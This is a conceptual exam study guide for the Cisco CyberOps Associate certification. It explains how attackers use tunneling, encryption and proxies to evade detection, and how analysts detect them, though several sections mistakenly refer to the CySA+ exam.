Describe evasion and obfuscation techniques, such as tunneling, encryption, and proxies

📘Cisco Certified CyberOps Associate (200-201 CBROPS)

1. What Are Evasion and Obfuscation Techniques?

Evasion

Evasion means bypassing security controls so that malicious activity is not detected.

Attackers try to avoid:

  • Firewalls
  • Intrusion Detection Systems (IDS)
  • Intrusion Prevention Systems (IPS)
  • Endpoint Detection and Response (EDR)
  • Antivirus software
  • Web filters
  • SIEM monitoring systems

Obfuscation

Obfuscation means hiding or disguising malicious content so it looks harmless.

Instead of attacking directly, attackers:

  • Hide commands
  • Encrypt traffic
  • Modify malware code
  • Use legitimate services to carry malicious traffic

For the exam, remember:

Evasion = Avoiding detection
Obfuscation = Hiding the true purpose

2. Tunneling

What is Tunneling?

Tunneling is a technique where attackers hide one type of traffic inside another protocol.

It allows malicious traffic to:

  • Pass through firewalls
  • Avoid content inspection
  • Bypass network restrictions

It works by wrapping malicious traffic inside allowed traffic.

Why Tunneling Works

Organizations often allow:

  • DNS traffic
  • HTTPS traffic
  • ICMP traffic
  • HTTP traffic

Attackers hide malicious communication inside these trusted protocols.

Common Tunneling Techniques

1. DNS Tunneling

DNS is almost always allowed through firewalls.

Attackers:

  • Encode data inside DNS queries
  • Send data to attacker-controlled DNS servers
  • Receive commands in DNS responses

This allows:

  • Data exfiltration
  • Command and control (C2) communication

Security analysts must monitor:

  • Unusually long DNS queries
  • High volume of DNS traffic
  • DNS requests to suspicious domains

2. HTTP/HTTPS Tunneling

Attackers hide malicious traffic inside web traffic.

Because HTTPS is encrypted:

  • Security tools cannot easily inspect the content
  • Malware communicates with C2 servers using HTTPS

For the exam:

  • HTTPS is commonly abused
  • Encrypted web traffic can hide malware traffic

3. ICMP Tunneling

ICMP is used for network diagnostics (like ping).

Attackers:

  • Hide data inside ICMP packets
  • Use ping traffic for communication

Security teams should monitor:

  • Large ICMP payload sizes
  • Frequent ICMP traffic

Exam Tip

If a question says:

“Data is being transferred through DNS queries”

The answer is likely:

DNS tunneling

3. Encryption as an Evasion Technique

What is Encryption?

Encryption converts readable data into unreadable format.

It is normally used for:

  • Secure communication
  • Protecting sensitive data

But attackers also use encryption to:

  • Hide malware communication
  • Avoid detection by IDS/IPS

How Attackers Use Encryption

1. Encrypted Command and Control (C2)

Malware communicates with attacker servers using:

  • HTTPS
  • TLS
  • Encrypted messaging protocols

Security devices cannot easily inspect encrypted traffic without SSL inspection.

2. File Encryption

Attackers may:

  • Encrypt malware payloads
  • Encrypt scripts
  • Encrypt droppers

This prevents antivirus from detecting known signatures.

3. Full Payload Encryption

Some malware encrypts:

  • Entire communication sessions
  • Data exfiltration traffic

This makes detection harder.

Detection Methods

Security analysts use:

  • SSL/TLS inspection
  • Traffic pattern analysis
  • Behavioral detection
  • Certificate inspection
  • Monitoring unusual encrypted outbound traffic

Exam Tip

If malware traffic is hidden using HTTPS:

  • This is encryption-based evasion
  • Security controls must inspect encrypted traffic

4. Proxies

What is a Proxy?

A proxy server acts as a middle system between client and destination server.

Instead of connecting directly:

  • The user connects to the proxy
  • The proxy forwards the traffic

Attackers use proxies to:

  • Hide their real IP address
  • Avoid being traced
  • Bypass IP-based blocking

Types of Proxies Used in Attacks

1. Anonymous Proxies

Hide the attacker’s IP address.

2. Open Proxies

Public proxy servers anyone can use.

3. Compromised Proxy Servers

Attackers use infected systems as relay systems.

Reverse Proxies

Used by attackers to:

  • Hide command-and-control infrastructure
  • Protect attacker servers from being directly identified

Proxy Chaining

Attackers may use:

  • Multiple proxies in sequence

This makes tracing extremely difficult.

Detection Clues

Security analysts may notice:

  • Suspicious outbound connections
  • Connections to known proxy services
  • Unusual geographic IP addresses
  • High traffic to uncommon destinations

5. Other Obfuscation Techniques You Should Know for the Exam

Although the question highlights tunneling, encryption, and proxies, CySA+ may also include:

1. Code Obfuscation

Attackers modify malware code to avoid signature detection:

  • Rename variables
  • Change file hashes
  • Insert junk code
  • Recompile malware

This helps malware avoid antivirus detection.

2. Polymorphic Malware

Changes its code every time it spreads.

Each infection looks different.

3. Fileless Malware

Runs in memory instead of writing files to disk.

Harder to detect with traditional antivirus.

4. Living off the Land (LotL)

Attackers use legitimate tools such as:

  • PowerShell
  • WMI
  • Built-in system tools

This blends malicious activity with normal operations.

5. Traffic Fragmentation

Attackers split malicious payload into small packets.

This:

  • Confuses signature-based IDS
  • Bypasses detection rules

6. How Security Analysts Detect Evasion Techniques

For the CySA+ exam, you must understand defensive methods.

Detection Techniques Include:

  • Network traffic analysis
  • Deep packet inspection (DPI)
  • Behavioral analysis
  • Anomaly detection
  • SSL/TLS inspection
  • DNS logging and monitoring
  • Proxy log analysis
  • SIEM correlation

7. Key Differences Summary

TechniquePurposeHow It Works
TunnelingHide trafficEncapsulate malicious traffic inside allowed protocol
EncryptionHide contentMake data unreadable to inspection tools
ProxyHide sourceUse intermediary system to mask IP

8. Exam-Focused Scenarios to Recognize

You should be able to identify:

  • Data hidden in DNS queries → DNS tunneling
  • Malware using HTTPS for C2 → Encrypted communication
  • Attacker IP cannot be traced → Proxy usage
  • Malware code constantly changes → Polymorphic malware
  • Suspicious traffic over allowed protocol → Tunneling

9. Important Analyst Responsibilities

As a CySA+ professional, you must:

  • Monitor encrypted outbound traffic
  • Inspect DNS logs regularly
  • Identify unusual traffic patterns
  • Correlate logs in SIEM
  • Implement SSL inspection where appropriate
  • Block known malicious proxy services
  • Enforce egress filtering

10. Final Exam Summary (Must Remember)

Evasion and obfuscation techniques are methods attackers use to:

  • Avoid detection
  • Hide malicious traffic
  • Bypass security controls
  • Blend into normal network activity

The three major ones covered here:

  1. Tunneling – Hiding malicious traffic inside allowed protocols
  2. Encryption – Making malicious traffic unreadable
  3. Proxies – Hiding attacker identity

For the exam:

  • Focus on recognizing patterns
  • Understand how they bypass detection
  • Know how analysts detect and respond
Buy Me a Coffee

Powered by
Necessary cookies enable essential site features like secure log-ins and consent preference adjustments. They do not store personal data.
None
Functional cookies support features like content sharing on social media, collecting feedback, and enabling third-party tools.
None
Analytical cookies track visitor interactions, providing insights on metrics like visitor count, bounce rate, and traffic sources.
None
Advertisement cookies deliver personalized ads based on your previous visits and analyze the effectiveness of ad campaigns.
None
Powered by